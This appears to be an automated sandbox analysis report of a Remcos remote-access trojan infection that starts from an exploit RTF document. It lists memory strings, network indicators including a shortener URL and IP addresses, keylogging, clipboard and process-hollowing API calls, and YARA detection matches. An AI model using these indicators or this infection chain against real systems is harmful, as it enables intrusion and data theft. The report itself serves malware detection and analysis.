                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: RegAsm.exe, 0000000D.00000002.405468738.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.405476161.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.405464101.0000000002B5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                    Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                    Source: rXgoN[1].htm.0.drString found in binary or memory: https://zeep.ly/rXgoN
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                    Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49166 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000012_2_0040A2F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004072B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_0040A41B
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTR

                    E-Banking Fraud

                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041CA73 SystemParametersInfoW,12_2_0041CA73

                    System Summary

                    Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0E0C498.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\rXgoN.url
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\gvt on 85.239.241.184.url
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9286
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_0041812A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,12_2_0041330D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00401806 NtdllDefWindowProc_W
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_004018C0 NtdllDefWindowProc_W
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004016FD NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004017B7 NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00402CAC NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00402D66 NtdllDefWindowProc_A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00214D50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00214D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0043706A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00414005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0043E11C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004541D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004381E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0041F18B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00446270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0043E34B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004533AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0042742E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00437566
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0043E5A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004387F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0043797E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004339D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0044DA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00427AD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0041DBF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00427C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00437DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00435EEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0043DEED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00426E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_10017194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_1000B5C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0044B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0043610D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00447310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0044A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040755A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0043C560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0044B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0044D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_004476F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0044B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0044081D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00414957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_004079EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00407AEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0044AA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00412AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00404B74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00404B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0044BBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00404BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00404C76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00415CFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00416D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00446D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00446D8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00406E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00405038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041208C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004050A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040511A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043C13A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004051AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00449300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040D322
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0044A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043A5AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00413631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00446690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0044A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004398D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004498E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0044A886
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043DA09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00438D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00449ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041FE83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00430F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004050C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004014AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00405133
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004051A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00401246
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040CA46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00405235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004032C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00401689
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00402F60
Source: ~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434801 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434E70 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00401E65 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00413025 appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00416760 appears 69 times
Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
